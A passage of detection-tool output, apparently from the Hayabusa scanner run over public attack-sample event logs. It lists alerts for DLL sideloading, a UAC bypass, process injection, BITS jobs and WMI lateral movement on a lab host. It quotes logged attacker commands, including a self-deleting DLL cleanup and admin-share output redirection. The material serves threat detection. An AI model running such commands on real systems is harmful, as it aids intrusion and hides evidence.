2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0xa09d1 | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:33.449 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\wwlib.dll | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | LID: 0xa09d1 | PID: 2920 | PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 840 | PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:36.312 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 840 | Tgt PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\explorer.exe"" | Process: C:\Windows\SysWOW64\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 6552 | PGUID: 747F3D96-D8EC-5F8A-0000-001094207300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Windows\SysWOW64\explorer.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 6552 | Tgt PGUID: 747F3D96-D8EC-5F8A-0000-001094207300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,Evas | Exec,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1576 | PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,Exec,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:45.130 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 1576 | Tgt PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1680 | PGUID: 747F3D96-D8F5-5F8A-0000-00106B6F7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe | URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe | URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Intel\wwlib.dll | Process: C:\Windows\Explorer.EXE | PID: 3364 | PGUID: 747F3D96-19FB-5F8B-0000-0010DB270A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: calc.exe | Process: C:\Windows\SysWOW64\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\ProgramData\Intel\CV.exe"" | LID: 0x8faa7 | PID: 1536 | PGUID: 747F3D96-1B5C-5F8B-0000-001006AF2100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca | Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 5912 | PGUID: 747F3D96-1B5C-5F8B-0000-0010A6E02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | Process: C:\Windows\System32\RuntimeBroker.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:10.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HCJVGQ5XQYJQFTRJAKRF.temp | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:10.791 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:52:31.218 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57238 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\7okjer.dll | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:52:34.966 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57239 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:01.646 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57240 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:04.161 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57241 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:04.924 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57242 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2628 | PGUID: 747F3D96-75D1-5F8B-0000-00109EB23300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.633 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | 
